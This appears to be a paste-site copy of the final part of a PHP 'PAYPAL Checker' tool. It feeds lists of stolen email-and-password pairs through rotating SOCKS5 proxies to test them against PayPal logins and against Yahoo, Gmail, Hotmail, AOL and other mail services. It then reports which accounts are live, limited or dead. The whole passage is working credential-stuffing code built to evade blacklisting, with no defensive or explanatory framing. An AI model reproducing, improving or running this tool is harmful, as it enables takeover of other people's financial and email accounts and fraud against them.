  1196.  
  1197. $k = yahoo($pieces['xMail'],$pieces['xPass'], $_sock);
  1198.  
  1199. if ($k==0){
  1200.  
  1201. $status="<font color=red>Email not available</font> - ".$servername."";
  1202.  
  1203. }else{
  1204.  
  1205. $status="<font color=blue>Email available</font> - ".$servername."";
  1206.  
  1207. }
  1208.  
  1209. }
  1210.  
  1211. elseif(stristr($pieces['xMail'],"hotmail.")||stristr($pieces['xMail'],"live.")){
  1212.  
  1213. $servername = "Hotmail";
  1214.  
  1215. if (hotmail($pieces['xMail'],$pieces['xPass'], $_sock)){
  1216.  
  1217. $status="<font color=blue>Email available</font> - ".$servername."";
  1218.  
  1219. }
  1220.  
  1221. else{
  1222.  
  1223. $status="<font color=red>Email not available</font> - ".$servername."";
  1224.  
  1225. }
  1226.  
  1227. }elseif(stristr($pieces['xMail'],"gmail.")||stristr($pieces['xMail'],"googlemail.")){
  1228.  
  1229. $servername = "Gmail";
  1230.  
  1231. $k = gmail($pieces['xMail'],$pieces['xPass'], $_sock);
  1232.  
  1233. if ($k==0){
  1234.  
  1235. $status="<font color=red>Email not available</font> - ".$servername."";
  1236.  
  1237. }
  1238.  
  1239. else{
  1240.  
  1241. $status="<font color=blue>Email available</font> - ".$servername."";
  1242.  
  1243. }
  1244.  
  1245. }elseif(stristr($pieces['xMail'],"aol.")||stristr($pieces['xMail'],"netscape.")){
  1246.  
  1247. $servername = "AOL";
  1248.  
  1249. $aolname = str_replace("@aol.com","",$pieces['xMail'], $_sock);
  1250.  
  1251. $kaol = aol($aolname,$pieces['xPass'], $_sock);
  1252.  
  1253. if ($kaol==0){
  1254.  
  1255. $status="<font color=red>Email not available</font> - ".$servername."";
  1256.  
  1257. }
  1258.  
  1259. else{
  1260.  
  1261. $status="<font color=blue>Email available</font> - ".$servername."";
  1262.  
  1263. }
  1264.  
  1265. }elseif(stristr($pieces['xMail'],"juno")){
  1266.  
  1267. $servername = "Juno";
  1268.  
  1269. $kjuno = juno($pieces['xMail'],$pieces['xPass'], $_sock);
  1270.  
  1271. if ($kjuno==0){
  1272.  
  1273. $status="<font color=red>Email not available</font> - ".$servername."";
  1274.  
  1275. }
  1276.  
  1277. else{
  1278.  
  1279. $status="<font color=blue>Email available</font> - ".$servername."";
  1280.  
  1281. }
  1282.  
  1283. }elseif(stristr($pieces['xMail'],"mac.")||stristr($pieces['xMail'],"me.")){
  1284.  
  1285. $servername = "Me-Mac";
  1286.  
  1287. $kmac = mac($pieces['xMail'],$pieces['xPass'], $_sock);
  1288.  
  1289. if ($kmac==0){
  1290.  
  1291. $status="<font color=red>Email not available</font> - ".$servername."";
  1292.  
  1293. }
  1294.  
  1295. else{
  1296.  
  1297. $status="<font color=blue>Email available</font> - ".$servername."";
  1298.  
  1299. }
  1300.  
  1301. }elseif(stristr($pieces['xMail'],"netzero.")){
  1302.  
  1303. $servername = "Netzero";
  1304.  
  1305. $knet = netzero($pieces['xMail'],$pieces['xPass'], $_sock);
  1306.  
  1307. if ($knet==0){
  1308.  
  1309. $status="<font color=red>Email not available</font> - ".$servername."";
  1310.  
  1311. }
  1312.  
  1313. else{
  1314.  
  1315. $status="<font color=blue>Email available</font> - ".$servername."";
  1316.  
  1317. }
  1318.  
  1319. }elseif(stristr($pieces['xMail'],"ameritech.")||stristr($pieces['xMail'],"att.")||stristr($pieces['xMail'],"bellsouth.")||stristr($pieces['xMail'],"flash.")||stristr($pieces['xMail'],"nvbell.")||stristr($pieces['xMail'],"pacbell.")||stristr($pieces['xMail'],"prodigy.")||stristr($pieces['xMail'],"sbcglobal.")||stristr($pieces['xMail'],"snet.")||stristr($pieces['xMail'],"swbell.")||stristr($pieces['xMail'],"wans.")){
  1320.  
  1321. $servername = "Att";
  1322.  
  1323. $katt = att($pieces['xMail'],$pieces['xPass'], $_sock);
  1324.  
  1325. if ($katt==0){
  1326.  
  1327. $status="<font color=red>Email not available</font> - ".$servername."";
  1328.  
  1329. }
  1330.  
  1331. else{
  1332.  
  1333. $status="<font color=blue>Email available</font> - ".$servername."";
  1334.  
  1335. }
  1336.  
  1337. }
  1338.  
  1339. else{
  1340.  
  1341. $status="<font color=grey>Unknow</font>";
  1342.  
  1343. }
  1344.  
  1345. return $status;
  1346.  
  1347. }
  1348.  
  1349.  
  1350.  
  1351. ?>
  1352.  
  1353. <html>
  1354.  
  1355. <head>
  1356.  
  1357. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1358.  
  1359. <title>PAYPAL Checker</title>
  1360.  
  1361. <script type="text/javascript">
  1362.  
  1363. function timsock(){
  1364.  
  1365. var sockslist = window.document.frmMain.s.value;
  1366.  
  1367. var fuck = sockslist.match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}((:)|(\s)+)\d{1,8}/g );
  1368.  
  1369. if(fuck){
  1370.  
  1371. var list="";
  1372.  
  1373. for(var i=0;i<fuck.length;i++){
  1374.  
  1375. if(fuck[i].match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}(\s)+\d{1,8}/g )){
  1376.  
  1377. fuck[i]=fuck[i].replace(/(\s)+/,':');
  1378.  
  1379. }
  1380.  
  1381. list=list+fuck[i]+"\n";
  1382.  
  1383. }
  1384.  
  1385. window.document.frmMain.s.value=list;
  1386.  
  1387. }
  1388.  
  1389. else{
  1390.  
  1391. window.document.frmMain.s.value="Error";
  1392.  
  1393. window.location = "#";
  1394.  
  1395. }
  1396.  
  1397. }
  1398.  
  1399. </script>
  1400.  
  1401. <link rel="stylesheet" type="text/css" href="http://antitos.explorecrew.org/cs/default1.css">
  1402.  
  1403. </head>
  1404.  
  1405. <body>
  1406.  
  1407. <center>
  1408.  
  1409. <form name="frmMain" id="frmMain" method="post" action="">
  1410.  
  1411. <div style="width:100%">
  1412.  
  1413. <div style="width:90%">
  1414.  
  1415. <p><center><h2>-[ PAYPAL Checker ]-</h2></center></p>
  1416.  
  1417. <center><p><font color=red><b><blink>Auto check Mail Password and auto change sock if login success or limited </blink></b></font></p></center>
  1418.  
  1419. <div id="mp" style="width:50%;float:left">
  1420.  
  1421. <b>List mail & password:</b>
  1422.  
  1423. </div>
  1424.  
  1425. <div id="mp" style="width:50%;float:left">
  1426.  
  1427. <b>List socks5</b><br />
  1428.  
  1429. (auto check blacklist, just add list socks 5 but recommend socks fresh/private ):
  1430.  
  1431. </div>
  1432.  
  1433. <div id="mp" style="clear:both;width:50%;float:left">
  1434.  
  1435. <textarea rows="10" style="width:100%" name="mp" value=""><?php echo $_POST['mp'];?></textarea>
  1436.  
  1437. </div>
  1438.  
  1439. <div id="s" style="width:50%;float:left">
  1440.  
  1441. <textarea rows="10" style="width:100%" name="s" value=""><?php echo $_POST['s'];?></textarea>
  1442.  
  1443. </div>
  1444.  
  1445. </div>
  1446.  
  1447. <div style="width:90%;clear:both">
  1448.  
  1449. <b>Delim : </b> <input type="text" name="split" size= 4 value="<?php if($_POST['split']){echo $_POST['split'];}else{ echo '|';}?>"/>
  1450.  
  1451. <b>Mail : </b> <input type="text" name="mail" size= 4 value="<?php if($_POST['mail']){echo $_POST['mail'];}else{echo '1';}?>" />
  1452.  
  1453. <b>Password : </b> <input type="text" name="pass" size= 4 value="<?php if($_POST['mail']){echo $_POST['pass'];}else{echo '2';}?>" />
  1454.  
  1455. <b>TimeOut PP : </b> <select name="paypaltimeout" ><option value="10" >10s</option><option value="9" >9s</option><option value="8" selected >8s</option><option value="7" >7s</option><option value="6" >6s</option><option value="5" >5s</option><option value="4" >4s</option><option value="3" >3s</option><option value="2" >2s</option><option value="1" >1s</option></select>
  1456.  
  1457. <br><input type=checkbox name=checkmail> Check Email <input type=checkbox name=getinfo> Get Infomation<br><br>
  1458.  
  1459. <input type="submit" name="submit" value=" Check Now " onclick="timsock();"/>
  1460.  
  1461. </div>
  1462.  
  1463. <br /><br /><br />
  1464.  
  1465. </div>
  1466.  
  1467. </form>
  1468.  
  1469. </center>
  1470.  
  1471. </body>
  1472.  
  1473. </html>
  1474.  
  1475. <?php
  1476.  
  1477. if(isset($_POST['mp']) && isset($_POST['s']) && isset($_POST['pass']) && isset($_POST['paypaltimeout'])){
  1478.  
  1479. $slist = trim($_POST['s']);
  1480.  
  1481. $mlist = trim($_POST['mp']);
  1482.  
  1483. $pp_timeout = trim($_POST['paypaltimeout']);
  1484.  
  1485. $slist = str_replace(array("\\\"","\\'"),array("\"","'"),$slist);
  1486.  
  1487. $slist = str_replace("\n\n","\n",$slist);
  1488.  
  1489. $mlist = str_replace(array("\\\"","\\'"),array("\"","'"),$mlist);
  1490.  
  1491. $mlist = str_replace("\n\n","\n",$mlist);
  1492.  
  1493. $slist = explode("\n", $slist);
  1494.  
  1495. $mlist = explode("\n", $mlist);
  1496.  
  1497. $email = trim($_POST['mail']);
  1498.  
  1499. $splits = trim($_POST['split']);
  1500.  
  1501. $pass = trim($_POST['pass']);
  1502.  
  1503.  
  1504.  
  1505. $tsdie = "";
  1506.  
  1507. $tslimit = "";
  1508.  
  1509. $tslive = "";
  1510.  
  1511. $tserror = "";
  1512.  
  1513. $sldie = 0;
  1514.  
  1515. $sllimit = 0;
  1516.  
  1517. $sllive = 0;
  1518.  
  1519. $slerror = 0;
  1520.  
  1521.  
  1522.  
  1523. if(!$splits || !$pass){
  1524.  
  1525. die("<br />Please enter complete information.<br /><br />");
  1526.  
  1527. }
  1528.  
  1529.  
  1530.  
  1531. $j = 0;
  1532.  
  1533. $dem_sl = 0;
  1534.  
  1535. for($i=0;$i<count($slist);$i++){
  1536.  
  1537. $maxs = $maxs + 1;
  1538.  
  1539. $_sockcheckto = $slist[$i];
  1540.  
  1541. $_checkclear = CheckSock($slist[$i], $cookiejar, $pp_timeout);
  1542.  
  1543. if ($_checkclear == "2"){
  1544.  
  1545. $_mp = explode($splits, $mlist[$j]);
  1546.  
  1547. $_mail = trim($_mp[($email - 1)]);
  1548.  
  1549. $_pass = trim($_mp[($pass - 1)]);
  1550.  
  1551. if(strlen($_pass)>7){
  1552.  
  1553. $paypal = isLogin($_mail, $_pass, $slist[$i],$splits);
  1554.  
  1555. $STT = $j + 1;
  1556.  
  1557. if($paypal == "SOCKTIME"){
  1558.  
  1559. echo $slist[$i]." <font color=orange> <<< Time Out</font><br>";
  1560.  
  1561. $j = $j - 1;
  1562.  
  1563. }
  1564.  
  1565. elseif($paypal == "SOCKBL"){
  1566.  
  1567. echo $slist[$i]." <font color=red> <<< BlackList</font><br>";
  1568.  
  1569. $j = $j - 1;
  1570.  
  1571. }
  1572.  
  1573. elseif($paypal == "LIMITED"){
  1574.  
  1575. echo "$STT. <b><font color=orange>LIMITED =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1576.  
  1577. $tslimit .= "<b><font color=orange>LIMITED =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1578.  
  1579. $sllimit++;
  1580.  
  1581. }
  1582.  
  1583. elseif($paypal == "SECURITY"){
  1584.  
  1585. echo "$STT. <b><font color=purple>SECURITY MEASURES =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1586.  
  1587. $tslimit .= "<b><font color=purple>SECURITY MEASURES =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1588.  
  1589. $sllimit++;
  1590.  
  1591. }
  1592.  
  1593. elseif($paypal == "PASSWORD"){
  1594.  
  1595. echo "$STT. <b><font color=blue>CREATE PASSWORD =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1596.  
  1597. $tserror .= "<b><font color=blue>CREATE PASSWORD =></b></font> $_mail | $_pass | $slist[$i]<br>";
  1598.  
  1599. $slerror++;
  1600.  
  1601. }
  1602.  
  1603. elseif($paypal == "DIE"){
  1604.  
  1605. echo "$STT. <b><font color=red>DIE =></font></b> $_mail | $_pass | $_slist[$i]<br>";
  1606.  
  1607. $tsdie .= "<b><font color=red>DIE =></font></b> $_mail | $_pass | $_slist[$i]<br>";
  1608.  
  1609. $dem_sl = $dem_sl + 1;
  1610.  
  1611. if($dem_sl == 5){
  1612.  
  1613. $i = $i + 1;
  1614.  
  1615. $dem_sl = 0;
  1616.  
  1617. }
  1618.  
  1619. $i = $i -1;
  1620.  
  1621. $sldie++;
  1622.  
  1623. }
  1624.  
  1625. elseif($paypal == "ERROR"){
  1626.  
  1627. echo "$STT. <b><font color=blue>ERROR =></font></b> $_mail | $_pass | $_slist[$i]<br>";
  1628.  
  1629. $tserror .= "<b><font color=blue>ERROR =></font></b> $_mail | $_pass | $_slist[$i]<br>";
  1630.  
  1631. $dem_sl = $dem_sl + 1;
  1632.  
  1633. if($dem_sl == 5){
  1634.  
  1635. $i = $i + 1;
  1636.  
  1637. $dem_sl = 0;
  1638.  
  1639. }
  1640.  
  1641. $i = $i -1;
  1642.  
  1643. $slerror++;
  1644.  
  1645. }
  1646.  
  1647. else{
  1648.  
  1649. echo "$STT. <b><font color=green>LIVE =></b></font> $paypal";
  1650.  
  1651. $tslive .= "<b><font color=green>LIVE =></b></font> $paypal";
  1652.  
  1653. $sllive++;
  1654.  
  1655. }
  1656.  
  1657. }
  1658.  
  1659. $j = $j + 1;
  1660.  
  1661. }
  1662.  
  1663. elseif($_checkclear == "1"){
  1664.  
  1665. echo $slist[$i]." <font color=red> <<< Blacklist PayPal</font><br>";
  1666.  
  1667. }elseif($_checkclear == "3"){
  1668.  
  1669. echo $slist[$i]." <font color=orange> <<< Time Out</font><br>";
  1670.  
  1671. }
  1672.  
  1673. flush();
  1674.  
  1675. sleep(1);
  1676.  
  1677. }
  1678.  
  1679. if($maxs > count($slist)){
  1680.  
  1681. echo "<font color=blue><b>Over Sock !!!</b></font>";
  1682.  
  1683. }else{
  1684.  
  1685. echo "<font color=blue><b>Tool use to sock:".$_sockcheckto."</b></font>";
  1686.  
  1687. }
  1688.  
  1689. unlink($cookiejar);
  1690.  
  1691.  
  1692.  
  1693. echo "<hr>";
  1694.  
  1695. echo "<center><font size=5 color=blue>Total : <font size=6 color=red>".count($mlist)."</font> | Live : <font color=red size=6>".$sllive."</font> | Limit : <font color=red size=6>".$sllimit."</font> | Die : <font color=red size=6>".$sldie."</font> | Error : <font color=red size=6>".$slerror."</font></font></center><hr>";
  1696.  
  1697. echo $tslive;
  1698.  
  1699. echo "<hr>";
  1700.  
  1701. echo $tslimit;
  1702.  
  1703. echo "<hr>";
  1704.  
  1705. echo $tsdie;
  1706.  
  1707. echo "<hr>";
  1708.  
  1709. echo $tserror;
  1710.  
  1711.  
  1712.  
  1713. }
  1714.  
  1715. ?>
  1716.  
  1717.  
  1718.  
  1719.  
  1720.  
  1721.  
  1722.  
  1723.  
  1724.  
  1725.  
  1726.  
  1727.  
  1728.  
  1729.  
  1730.  
  1731.  
  1732.  
  1733.  
  1734. <object> <center></object><object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor" /><param value="mp3=http://xover3.jkt.3d.x.indowebster.com/download-vip/35/p16g21hrn813b715s61ue15l4ies6.mp3/%5Bwww.indowebster.com%5D-Asking_Alexandria_-_hiatus.mp3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars" /></object></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement